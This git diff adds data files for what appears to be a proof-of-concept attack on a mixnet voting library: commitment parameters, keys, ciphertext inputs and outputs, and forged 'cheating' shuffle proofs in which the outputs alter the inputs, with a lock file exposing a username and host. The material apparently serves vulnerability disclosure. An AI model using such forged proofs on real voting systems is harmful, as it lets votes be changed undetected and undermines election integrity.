"randomnessTau" : { + "class" : "com.scytl.products.ov.mixnet.commons.homomorphic.impl.GjosteenElGamalRandomness", + "randomnessValue" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 7312966931808455907809427232419069695171255 + } + } + } + } +} \ No newline at end of file diff --git a/TrapdoorCommitmentCheatingProofs/proofs-2-zero/input-2-zero.csv b/TrapdoorCommitmentCheatingProofs/proofs-2-zero/input-2-zero.csv new file mode 100644 index 0000000..904c69f --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs-2-zero/input-2-zero.csv @@ -0,0 +1,4 @@ +1;3 +1;3 +1;7 +1;7 diff --git a/TrapdoorCommitmentCheatingProofs/proofs-2-zero/output-2-zero.csv b/TrapdoorCommitmentCheatingProofs/proofs-2-zero/output-2-zero.csv new file mode 100644 index 0000000..be703fd --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs-2-zero/output-2-zero.csv @@ -0,0 +1,4 @@ +1;6 +1;6 +1;14 +1;14 diff --git a/TrapdoorCommitmentCheatingProofs/proofs-2-zero/publicKey-2-zero.out b/TrapdoorCommitmentCheatingProofs/proofs-2-zero/publicKey-2-zero.out new file mode 100644 index 0000000..65da0c7 --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs-2-zero/publicKey-2-zero.out @@ -0,0 +1 @@ +{"publicKey":{"zpSubgroup":{"g":"Ag==","p":"AK+RIPEJgBcfry8YICwtmoutvw==","q":"V8iQeITAC4/Xl4wQFhbNRdbf"},"elements":["RDpx3om0j/3TQlNyKH9xgxKP"]}} diff --git a/TrapdoorCommitmentCheatingProofs/proofs-2/commitmentParams-2.out b/TrapdoorCommitmentCheatingProofs/proofs-2/commitmentParams-2.out new file mode 100644 index 0000000..f376b87 --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs-2/commitmentParams-2.out @@ -0,0 +1,6 @@ +15294034768093677312256663166625633354362303 +7647017384046838656128331583312816677181151 +2 +9203968993630645712771081704627051427447759 +14332802404593506442946333707859196359964454 +8831868083238621953171992654757873908933881 diff --git a/TrapdoorCommitmentCheatingProofs/proofs-2/complete-proof-2.json b/TrapdoorCommitmentCheatingProofs/proofs-2/complete-proof-2.json new file mode 100644 index 0000000..f3a5aae --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs-2/complete-proof-2.json @@ -0,0 +1,253 @@ +{ + "initialMessage" : [ { + "element" : { + "value" : 5686901005743611126667229787203460245018803, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 11185574507156442704730883614240682198226663, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ], + "firstAnswer" : [ { + "element" : { + "value" : 9098388144584288459111452508192080464282792, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 8067650293804250902892883407337649732105425, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ], + "secondAnswer" : { + "msgPA" : { + "commitmentPublicB" : { + "element" : { + "value" : 13308914475547924926922469174589760441015317, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "iniSVA" : { + "commitmentPublicD" : { + "element" : { + "value" : 1605184055414561288064504123923179544724733, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicLowDelta" : { + "element" : { + "value" : 5861662573058819572209530162153359585358998, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicHighDelta" : { + "element" : { + "value" : 8280387761712157071829379804196779950685450, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } + }, + "ansSVA" : { + "exponentsTildeA" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 2048705207138211641444093679110956410151907 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 3087434215097852071603895895112341672385918 + } ], + "exponentsTildeB" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 2048705207138211641444093679110956410151907 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 6696084153571906533755106588893595019170714 + } ], + "exponentTildeR" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 5543399901869633977353553638943488923447741 + }, + "exponentTildeS" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 643741702192512097722606432027765685296208 + } + }, + "iniHPA" : { + "commitmentPublicB" : [ { + "element" : { + "value" : 6327690226133533100561029359395144915465773, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 13308914475547924926922469174589760441015317, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ] + }, + "ansHPA" : { + "initial" : { + "commitmentPublicA0" : { + "element" : { + "value" : 13015266211256164999863864672210543361022124, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicBM" : { + "element" : { + "value" : 6026181322654755480742080767992639908709587, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicD" : [ { + "element" : { + "value" : 7331607488672995258765080486405978872976881, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 1894090974930911098072270000480100394368502, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 13096939031718806200750224233395756671045191, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 1, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 7822333799298211488612759098983200061277096, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ] + }, + "answer" : { + "exponentsA" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 1175750054930794375731096682745303852998107 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 5808711348011305531153670523152495168390857 + } ], + "exponentsB" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 350703386898770409698230879933876216831011 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 4217172366455270910099303525888730392831401 + } ], + "exponentR" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 1683895571035260991593959169075194685599885 + }, + "exponentS" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 7621083655812860561453115769846396491123422 + }, + "exponentT" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 424053448677071126771993249764579481631896 + } + } + } + }, + "iniMEBasic" : { + "commitmentPublicA0" : { + "element" : { + "value" : 2759157306851535163019657152225126278887521, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicB" : [ { + "element" : { + "value" : 661682593921274908605486464479066260880262, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 10982393225664943757638751590603257242846633, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 1, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 12838434784315019570106430399687649584223253, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ], + "ciphertextsE" : [ { + "gamma" : "4525428873869209818071924361199255083942365;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151", + "phis" : "214343506093432265690756905171763315494555;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151" + }, { + "gamma" : "1076964826531991618141161689415153389527152;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151", + "phis" : "11202815785598218054021408068895855606276593;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151" + }, { + "gamma" : "12752102622711108900002141241608746992169017;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151", + "phis" : "13653225323107511233668018260456535265011138;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151" + }, { + "gamma" : "14343024304369973282148345604664282118668037;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151", + "phis" : "14827632853608820330748444120741876723146065;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151" + } ] + }, + "ansMEBasic" : { + "exponentsA" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 92781825866804719318430135823566967093295 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 3023943052674527679192109380427169610783723 + } ], + "exponentR" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 847700230455438529446923586302583399819097 + }, + "exponentsB" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 3764552723782555749176323315987975666809758 + }, + "exponentS" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 40297487583321671700788688452234126512215 + }, + "randomnessTau" : { + "class" : "com.scytl.products.ov.mixnet.commons.homomorphic.impl.GjosteenElGamalRandomness", + "randomnessValue" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 4877163275761485000897865151562905858291537 + } + } + } + } +} \ No newline at end of file diff --git a/TrapdoorCommitmentCheatingProofs/proofs-2/input-2.csv b/TrapdoorCommitmentCheatingProofs/proofs-2/input-2.csv new file mode 100644 index 0000000..0be2e57 --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs-2/input-2.csv @@ -0,0 +1,4 @@ +1026042511419262820832249882115460685224240;3015764923853760044298653977223102794527076 +2938977807617366470350745970123934596326979;14491291112887512153128392244066542584810285 +9211524437286051898709289466753741743844498;14848135518571806581401721082169753478831714 +5558301597838992791301691121646397483249337;13347394279435188885524743642377482062707466 diff --git a/TrapdoorCommitmentCheatingProofs/proofs-2/output-2.csv b/TrapdoorCommitmentCheatingProofs/proofs-2/output-2.csv new file mode 100644 index 0000000..607e9ab --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs-2/output-2.csv @@ -0,0 +1,4 @@ +4922094083415250286671215611572541236275096;7175880475750666060651643017937492538939731 +9576065297999906701346209654966964223388101;9727876224694605471305038720285277846537990 +1596375784145042451296706798393553519630250;8391886501929666544461499551138587096024257 +4928611825032374492667637516002535373258350;13743241727424329899169425196420614390745368 diff --git a/TrapdoorCommitmentCheatingProofs/proofs-2/publicKey-2.out b/TrapdoorCommitmentCheatingProofs/proofs-2/publicKey-2.out new file mode 100644 index 0000000..65da0c7 --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs-2/publicKey-2.out @@ -0,0 +1 @@ +{"publicKey":{"zpSubgroup":{"g":"Ag==","p":"AK+RIPEJgBcfry8YICwtmoutvw==","q":"V8iQeITAC4/Xl4wQFhbNRdbf"},"elements":["RDpx3om0j/3TQlNyKH9xgxKP"]}} diff --git a/TrapdoorCommitmentCheatingProofs/proofs-zero/commitmentParams-zero.out b/TrapdoorCommitmentCheatingProofs/proofs-zero/commitmentParams-zero.out new file mode 100644 index 0000000..f3db46e --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs-zero/commitmentParams-zero.out @@ -0,0 +1,6 @@ +15294034768093677312256663166625633354362303 +7647017384046838656128331583312816677181151 +2 +1029878453743409859479915403327532913980462 +10224117588548335241978037913616493447721042 +563169352382602431283384400208190729682631 diff --git a/TrapdoorCommitmentCheatingProofs/proofs-zero/complete-proof-zero.json b/TrapdoorCommitmentCheatingProofs/proofs-zero/complete-proof-zero.json new file mode 100644 index 0000000..5845726 --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs-zero/complete-proof-zero.json @@ -0,0 +1,253 @@ +{ + "initialMessage" : [ { + "element" : { + "value" : 303842726782477875242759263157127528264350, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 11659242704527572945798719114646766962176622, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ], + "firstAnswer" : [ { + "element" : { + "value" : 778961555538900025634918598762301228204022, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 8936582124021882446323731905103436060642142, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ], + "secondAnswer" : { + "msgPA" : { + "commitmentPublicB" : { + "element" : { + "value" : 4277501158944991354761939399357623029141257, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "iniSVA" : { + "commitmentPublicD" : { + "element" : { + "value" : 2138458177652348805644835079194881703514017, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicLowDelta" : { + "element" : { + "value" : 13884611855667141299605993999031015873529688, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicHighDelta" : { + "element" : { + "value" : 7202104855370552979810745056616797993870116, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } + }, + "ansSVA" : { + "exponentsTildeA" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 3703384104782392650613377056512885793407503 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 2399287754769777852221094247967866612320174 + } ], + "exponentsTildeB" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 3703384104782392650613377056512885793407503 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 6269365802055719774898026303592213700697291 + } ], + "exponentTildeR" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 5346308280451636561330553670557867752311546 + }, + "exponentTildeS" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 4012725041075402778366930820877355971591811 + } + }, + "iniHPA" : { + "commitmentPublicB" : [ { + "element" : { + "value" : 9599143890526168083063704729474790092348929, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 4277501158944991354761939399357623029141257, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ] + }, + "ansHPA" : { + "initial" : { + "commitmentPublicA0" : { + "element" : { + "value" : 12147589225588383406100649293491156257989028, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicBM" : { + "element" : { + "value" : 4541081311967626700912317379744058012285849, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicD" : [ { + "element" : { + "value" : 7490528551125606784494389986510145538268637, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 1599718014085248405970518874222340958059358, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 8892805497557649066250950041502426698438860, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 1, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 6290563905837385560518345347981195718382829, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ] + }, + "answer" : { + "exponentsA" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 2982805403811355730317953011407519848501502 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 2743646096854534320019228357072529053912860 + } ], + "exponentsB" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 6033376414483381153878609494728121148884799 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 7261616265973933270090553666518279281401481 + } ], + "exponentR" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 2417887844273323996656593010121579177045572 + }, + "exponentS" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 4526770588053081955431713167815624293043828 + }, + "exponentT" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 7389411533966235535583008565028369337919151 + } + } + } + }, + "iniMEBasic" : { + "commitmentPublicA0" : { + "element" : { + "value" : 9401760153583208145090252577459254228204572, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicB" : [ { + "element" : { + "value" : 9442414842470928916443848227913841398757662, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 13523254227677285129350374429065071552602255, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 1, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 4479682068484803756669880693876353644298151, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ], + "ciphertextsE" : [ { + "gamma" : "11383958119490154289541529033575238477657341;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151", + "phis" : "2608564042755721256500581491076438445384361;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151" + }, { + "gamma" : "4974763137379829713304970641113761428021376;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151", + "phis" : "5471163802520413883492505228729547592206655;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151" + }, { + "gamma" : "1;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151", + "phis" : "3972685637770820047841394786586338645489663;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151" + }, { + "gamma" : "14145824223134878123136114002782643799870958;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151", + "phis" : "4583434245826005074553772595242688597841858;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151" + } ] + }, + "ansMEBasic" : { + "exponentsA" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 2475973434398375069185036593294590458252147 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 1296539682510040666048584621908776790249012 + } ], + "exponentR" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 6572773589978554762751536479057631664836327 + }, + "exponentsB" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 4720400950150954226706208739689978053554245 + }, + "exponentS" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 3260108408879721068564784190975797589645255 + }, + "randomnessTau" : { + "class" : "com.scytl.products.ov.mixnet.commons.homomorphic.impl.GjosteenElGamalRandomness", + "randomnessValue" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 3104614603568483463254697266094464648321125 + } + } + } + } +} \ No newline at end of file diff --git a/TrapdoorCommitmentCheatingProofs/proofs-zero/input-zero.csv b/TrapdoorCommitmentCheatingProofs/proofs-zero/input-zero.csv new file mode 100644 index 0000000..1638c8f --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs-zero/input-zero.csv @@ -0,0 +1,4 @@ +1;2 +1;2 +1;3 +1;7 diff --git a/TrapdoorCommitmentCheatingProofs/proofs-zero/output-zero.csv b/TrapdoorCommitmentCheatingProofs/proofs-zero/output-zero.csv new file mode 100644 index 0000000..6e2753f --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs-zero/output-zero.csv @@ -0,0 +1,4 @@ +1;2 +1;3 +1;3 +1;7 diff --git a/TrapdoorCommitmentCheatingProofs/proofs-zero/publicKey-zero.out b/TrapdoorCommitmentCheatingProofs/proofs-zero/publicKey-zero.out new file mode 100644 index 0000000..65da0c7 --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs-zero/publicKey-zero.out @@ -0,0 +1 @@ +{"publicKey":{"zpSubgroup":{"g":"Ag==","p":"AK+RIPEJgBcfry8YICwtmoutvw==","q":"V8iQeITAC4/Xl4wQFhbNRdbf"},"elements":["RDpx3om0j/3TQlNyKH9xgxKP"]}} diff --git a/TrapdoorCommitmentCheatingProofs/proofs/.~lock.input.csv# b/TrapdoorCommitmentCheatingProofs/proofs/.~lock.input.csv# new file mode 100644 index 0000000..26c914e --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs/.~lock.input.csv# @@ -0,0 +1 @@ +,vanessa,detritus.greatcactus.org,01.03.2019 11:22,file:///home/vanessa/.config/libreoffice/4; \ No newline at end of file diff --git a/TrapdoorCommitmentCheatingProofs/proofs/commitmentParams.out b/TrapdoorCommitmentCheatingProofs/proofs/commitmentParams.out new file mode 100644 index 0000000..6c68012 --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs/commitmentParams.out @@ -0,0 +1,6 @@ +15294034768093677312256663166625633354362303 +7647017384046838656128331583312816677181151 +2 +13124687552318082285772210889381735736502357 +98496287585364772716717658168335680302640 +979760984274784307525713813936727293587996 diff --git a/TrapdoorCommitmentCheatingProofs/proofs/complete-proof.json b/TrapdoorCommitmentCheatingProofs/proofs/complete-proof.json new file mode 100644 index 0000000..57b9217 --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs/complete-proof.json @@ -0,0 +1,253 @@ +{ + "initialMessage" : [ { + "element" : { + "value" : 10111748873113388478753399241444653642503357, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 4328225576940976374290419659592551010479283, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ], + "firstAnswer" : [ { + "element" : { + "value" : 13652753204723397584717761614065622445677293, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 8558784199372668339559346360480524120999844, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ], + "secondAnswer" : { + "msgPA" : { + "commitmentPublicB" : { + "element" : { + "value" : 1289161665596610043841415396209547740738352, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "iniSVA" : { + "commitmentPublicD" : { + "element" : { + "value" : 7594570065194556390124121241010079121762209, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicLowDelta" : { + "element" : { + "value" : 2620996818320143599171474107132085319660174, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicHighDelta" : { + "element" : { + "value" : 988021993110106465539854225588824836813484, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } + }, + "ansSVA" : { + "exponentsTildeA" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 1901524969758326009785342198326654866377194 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 4206972039693111928234839483584896822216661 + } ], + "exponentsTildeB" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 1901524969758326009785342198326654866377194 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 2334529994278230900850789660228905631719366 + } ], + "exponentTildeR" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 93621144339999084754416503974545674818642 + }, + "exponentTildeS" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 1697403840486520024561740887218656515343202 + } + }, + "iniHPA" : { + "commitmentPublicB" : [ { + "element" : { + "value" : 3289945505050429080578099673242312147133884, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 1289161665596610043841415396209547740738352, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ] + }, + "ansHPA" : { + "initial" : { + "commitmentPublicA0" : { + "element" : { + "value" : 9780611175931126287373680567488044443592220, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicBM" : { + "element" : { + "value" : 10136345154018214956240586573981034733226564, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicD" : [ { + "element" : { + "value" : 4113142183889731593060162178604717040917259, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 11871854645621103893665806463192145293946700, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 10678793172357006173761034051161877450693959, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 1, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 7190246145227798328769851875239243057791586, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ] + }, + "answer" : { + "exponentsA" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 1002187969183751835488098462826256439224302 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 1648293102727119479230749401506970975631192 + } ], + "exponentsB" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 1077114143477354758527328951931010872648928 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 973788045687454928782099792070583059085544 + } ], + "exponentR" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 4583343814642703558705203898263885395984684 + }, + "exponentS" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 3018331769911991520779602549727327390960884 + }, + "exponentT" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 3822040574161212608837247431068845214257133 + } + } + } + }, + "iniMEBasic" : { + "commitmentPublicA0" : { + "element" : { + "value" : 2733599500631744447924655384055464344925424, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicB" : [ { + "element" : { + "value" : 10145346364837649655801377819595271382118850, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 7001657834264767248349809620875098487420803, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 1, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 3686268759135595314030264951080976711538502, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ], + "ciphertextsE" : [ { + "gamma" : "8765839074965327864239007636367668687050966;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151", + "phis" : "10383041402233745318646620977812923651694356;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151" + }, { + "gamma" : "3958855092651399541899803757186782473381898;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151", + "phis" : "3481612633050527655310492408358153245058726;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151" + }, { + "gamma" : "14105443562863962656078009316581696481380679;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151", + "phis" : "2257127027995072960420937796643704636756187;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151" + }, { + "gamma" : "10848618481471065709671091330683134836487800;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151", + "phis" : "5969861756426068995522928925053221029392570;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151" + } ] + }, + "ansMEBasic" : { + "exponentsA" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 1779489080146645218164867367641829392560449 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 5425685570506741986848986716754113996877054 + } ], + "exponentR" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 1140913206488447394657733864182641370287374 + }, + "exponentsB" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 4396292364043134669156992011068318494319052 + }, + "exponentS" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 2843984736605655733352005915475535976030536 + }, + "randomnessTau" : { + "class" : "com.scytl.products.ov.mixnet.commons.homomorphic.impl.GjosteenElGamalRandomness", + "randomnessValue" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 7645255848832246297147477111691160338198058 + } + } + } + } +} \ No newline at end of file diff --git a/TrapdoorCommitmentCheatingProofs/proofs/input.csv b/TrapdoorCommitmentCheatingProofs/proofs/input.csv new file mode 100644 index 0000000..a981ff8 --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs/input.csv @@ -0,0 +1,4 @@ +1026042511419262820832249882115460685224240;12206533127964958237703544762565824099259586 +2938977807617366470350745970123934596326979;9660860741925008102085594829377695056540190 +9211524437286051898709289466753741743844498;8548348760544156722351689487590699112979635 +5558301597838992791301691121646397483249337;13347394279435188885524743642377482062707466 diff --git a/TrapdoorCommitmentCheatingProofs/proofs/output.csv b/TrapdoorCommitmentCheatingProofs/proofs/output.csv new file mode 100644 index 0000000..f3ab3e1 --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs/output.csv @@ -0,0 +1,4 @@ +4922094083415250286671215611572541236275096;12587983337312673561721656450396253082554779 +13863694355863029516915070319609169202749868;11209154892812673438053869054834196110193895 +1596375784145042451296706798393553519630250;5075554557862145112153892010949475810797120 +4928611825032374492667637516002535373258350;6871620863712164949584712598210307195372684 diff --git a/TrapdoorCommitmentCheatingProofs/proofs/publicKey.out b/TrapdoorCommitmentCheatingProofs/proofs/publicKey.out new file mode 100644 index 0000000..65da0c7 